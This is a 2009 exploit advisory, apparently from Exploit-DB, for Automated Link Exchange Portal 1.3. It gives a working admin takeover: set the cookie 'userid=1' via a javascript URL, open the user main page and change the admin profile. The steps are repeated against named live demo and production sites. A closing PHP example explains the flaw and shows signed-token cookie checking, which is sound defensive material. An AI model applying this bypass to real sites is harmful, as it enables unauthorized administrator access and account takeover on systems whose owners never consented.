Automated link exchange portal 1.3 - Multiple Vulnerabilities

EDB-ID: 8904
CVE: N/A
Author: TiGeR-Dz
Type: webapps
Platform: PHP
Date: 2009-06-08


-------------------------------------------------------------------------
 Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities
 ---------------------------------------------------------------
 Founder : TiGeR-Dz
 Home: www.h4ckx.com
 Script: Automated Link Exchange Portal Version 1.3
 Download: http://www.cmsnx.com/product.demo.php?id=11
 A thousand congratulations on the national team's win :D
 ---------------------------------------------------------------
 Exploit
 -------
 Note: Follow these steps

 After setting the cookie (javascript:document.cookie="userid=1;path=/";), go to
 http://www.site.com/[path]/user.mainpage.php to log in, then change the admin profile at
 http://www.site.com/[path]/user.edit.account.php

 Exploit = cookie handling + login bypass + profile change :)
 --------------------------------------------------------------
 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

 -------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.site.com/[path]/user.mainpage.php
 
 ----------------------------------------------------------------
 
 change profile Admin :
 ----------------------------

 http://www.site.com/[path]/user.edit.account.php 

----------------------------------------------------------
 Demo
 ----
 http://www.kalptarudemos.com/demo/linkspile/
----------------------------------------------------------------

 cookie handling :
 -----------------------

 javascript:document.cookie="userid=1;path=/";

-------------------------------------------------------------
 Bypass login :
 ------------------

 go to http://www.kalptarudemos.com/demo/linkspile/user.mainpage.php
 
 ----------------------------------------------------------------
 
 change profile Admin :
 ----------------------------

 http://www.kalptarudemos.com/demo/linkspile/user.edit.account.php

----------------------------------------------------------

test:
--------

http://www.linkspile.com/
---------------------------------------------------------------

 Greeting To ALL My Friends (Dz)
 -----------------------------------------------------------------

# milw0rm.com [2009-06-08]
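
The cookie-handling flaw above comes down to the server treating a client-set `userid` cookie as proof of identity. The added example below is not code from the advisory or from the product; the function names, the `auth` cookie name and the token layout are assumptions, and it contrasts that pattern with a cookie the server can verify.

```php
<?php
// Added example: hypothetical code, not taken from Automated Link Exchange Portal.

// Pattern the advisory implies (ASSUMPTION): identity is read straight from a
// client-controlled cookie, so any visitor can claim any account id.
function current_user_vulnerable(array $cookies): ?int
{
    return isset($cookies['userid']) ? (int)$cookies['userid'] : null;
}

// Hardened: the cookie carries "id.expiry.mac". The MAC is keyed with a
// server-side secret, so a client cannot mint a value for another account.
function issue_token(int $userId, string $key, int $ttl = 3600): string
{
    $payload = $userId . '.' . (time() + $ttl);
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

function current_user_hardened(array $cookies, string $key): ?int
{
    $parts = explode('.', (string)($cookies['auth'] ?? ''));
    if (count($parts) !== 3 || !ctype_digit($parts[0]) || !ctype_digit($parts[1])) {
        return null;                        // missing or malformed token
    }
    [$id, $expiry, $mac] = $parts;
    $expected = hash_hmac('sha256', "$id.$expiry", $key);
    if (!hash_equals($expected, $mac)) {    // constant-time comparison
        return null;                        // forged or tampered token
    }
    if ((int)$expiry < time()) {
        return null;                        // expired token
    }
    return (int)$id;
}

// Constructed demonstration values.
$key    = random_bytes(32);                         // server-side secret
$forged = ['userid' => '1'];                        // hand-set cookie from the advisory
$legit  = ['auth' => issue_token(42, $key)];        // issued after a real login
$tamper = ['auth' => preg_replace('/^42/', '1', $legit['auth'])]; // id swapped, MAC kept

var_dump(current_user_vulnerable($forged));         // old check, hand-set cookie
var_dump(current_user_hardened($forged, $key));     // new check, hand-set cookie
var_dump(current_user_hardened($legit, $key));      // new check, issued token
var_dump(current_user_hardened($tamper, $key));     // new check, tampered token
```

Server-side session state established at login (PHP's `$_SESSION`) achieves the same result without a custom token format.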